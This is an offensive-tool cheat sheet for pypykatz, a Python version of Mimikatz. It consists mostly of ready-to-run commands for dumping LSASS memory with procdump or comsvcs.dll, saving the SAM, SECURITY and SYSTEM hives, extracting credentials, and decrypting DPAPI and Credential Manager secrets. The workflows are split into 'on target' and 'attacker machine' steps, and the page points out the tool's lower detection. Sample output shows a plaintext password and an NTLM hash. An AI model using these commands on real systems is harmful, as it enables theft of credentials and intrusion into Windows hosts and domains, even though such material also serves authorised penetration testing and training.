pypykatz

pypykatz is a Python implementation of Mimikatz, allowing credential extraction and DPAPI attacks without requiring native Windows binaries. It can parse LSASS dumps offline (cross-platform) or attack live systems on Windows. This makes it ideal for situations where running the original Mimikatz is not possible or would trigger detection.

Key Capabilities

Offline Analysis: Parse LSASS memory dumps from any OS (Linux, macOS, Windows)
Live LSASS Access: Extract credentials from running LSASS process (Windows only)
DPAPI Attacks: Decrypt DPAPI-protected secrets including Credential Manager
Registry Parsing: Extract secrets from SAM, SECURITY, and SYSTEM hives
Cross-Platform: Works on Linux, macOS, and Windows

Installation

# Via pip
pip3 install pypykatz

# From GitHub
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
pip3 install .

Basic Usage

Parse LSASS Memory Dump

pypykatz lsa minidump lsass.dmp

Parse LSASS Dump (JSON Output)

pypykatz lsa minidump lsass.dmp -o json > creds.json

Live LSASS Extraction (Windows, requires admin)

pypykatz live lsa

Parse Registry Hives Offline

pypykatz registry --sam SAM --security SECURITY --system SYSTEM

Credential Manager / DPAPI Attacks

Decrypt Credential Files

# Decrypt a single credential file
pypykatz dpapi credential <credential_file> <masterkey>

# Decrypt all credentials in a directory
pypykatz dpapi credentials <credentials_dir> --mkf <masterkey_file>

Decrypt Vault Credentials

pypykatz dpapi vcrd <vcrd_file> <masterkey>

Extract DPAPI Masterkeys from LSASS Dump

pypykatz lsa minidump lsass.dmp | grep -A5 "dpapi"

Decrypt Masterkey File

# With user password
pypykatz dpapi masterkey <masterkey_file> -p <password>

# With domain backup key
pypykatz dpapi masterkey <masterkey_file> --pvk <domain_backup_key.pvk>

# With SID and password
pypykatz dpapi prekey password <SID> <password>

LSASS Dump Analysis

Full Credential Dump

pypykatz lsa minidump lsass.dmp

Output Formats

Option	Description
`-o json`	JSON output
`-o grep`	Grep-friendly output
`-o text`	Human-readable text (default)

Parse Multiple Dumps

pypykatz lsa minidump dump1.dmp dump2.dmp dump3.dmp

Recursive Directory Parsing

pypykatz lsa minidump /path/to/dumps/ -r

Registry Attacks

Dump SAM Database

pypykatz registry --sam SAM --system SYSTEM

Dump LSA Secrets

pypykatz registry --security SECURITY --system SYSTEM

Dump Cached Domain Credentials

pypykatz registry --security SECURITY --system SYSTEM

Full Registry Extraction

pypykatz registry --sam SAM --security SECURITY --system SYSTEM

Common Workflows

Workflow 1: Offline LSASS Analysis

# On target: Create minidump (various methods)
procdump.exe -ma lsass.exe lsass.dmp
# or: rundll32 comsvcs.dll MiniDump <PID> lsass.dmp full
# or: Task Manager > Details > lsass.exe > Create dump file

# On attacker machine (any OS)
pypykatz lsa minidump lsass.dmp

Workflow 2: Credential Manager Extraction

# 1. Locate credential files
# User credentials: %AppData%\Microsoft\Credentials\
# System credentials: %SystemRoot%\System32\config\systemprofile\...

# 2. Locate masterkey files
# %AppData%\Microsoft\Protect\<SID>\

# 3. Get masterkey from LSASS dump
pypykatz lsa minidump lsass.dmp | grep -i dpapi

# 4. Decrypt credential file
pypykatz dpapi credential <credential_file> <masterkey_guid>:<masterkey_hex>

Workflow 3: Offline Registry Attack

# On target: Export registry hives (requires admin)
reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM

# On attacker machine
pypykatz registry --sam SAM --security SECURITY --system SYSTEM

Output Examples

LSASS Dump Output

== LogonSession ==
authentication_id 630472 (99ec8)
session_id 3
username mcharles
domainname SRV01
logon_server SRV01
logon_time 2025-04-27T02:40:32
sid S-1-5-21-1340203682-1669575078-4153855890-1002
        == CREDMAN [00000000] ==
        username mcharles@inlanefreight.local
        domain onedrive.live.com
        password p@ssw0rd123!

Registry Dump Output

============== SAM ==============
HBoot Key: a1b2c3d4...
SAM Key: e5f6g7h8...

== User: Administrator ==
RID: 500
NTLM: aad3b435b51404eeaad3b435b51404ee

Comparison with Mimikatz

Feature	pypykatz	Mimikatz
Platform	Cross-platform	Windows only
Live LSASS	Windows only	Windows
Offline LSASS	Any OS	Windows
Detection	Lower (Python)	Higher (well-known)
Dependencies	Python 3	None (standalone)
Kerberos attacks	Limited	Full support
Token manipulation	No	Yes

Useful Options

Option	Description
`-o <format>`	Output format (json, grep, text)
`-r`	Recursive directory parsing
`-k`	Kerberos ticket extraction
`--pvk`	Domain backup key for masterkey decryption

Tool	Description
Mimikatz	Original Windows credential extraction
LaZagne	Multi-platform credential recovery
SharpDPAPI	C# DPAPI attacks
DonPAPI	Remote DPAPI extraction
Impacket	Python toolkit with secretsdump.py

Core Takeaways

Use pypykatz for offline analysis of LSASS dumps on non-Windows systems
Supports same DPAPI attacks as Mimikatz for Credential Manager extraction
Lower detection rate compared to native Mimikatz binary
Registry parsing provides SAM, LSA secrets, and cached credentials
JSON output enables easy parsing and automation

Keyboard shortcuts

notebook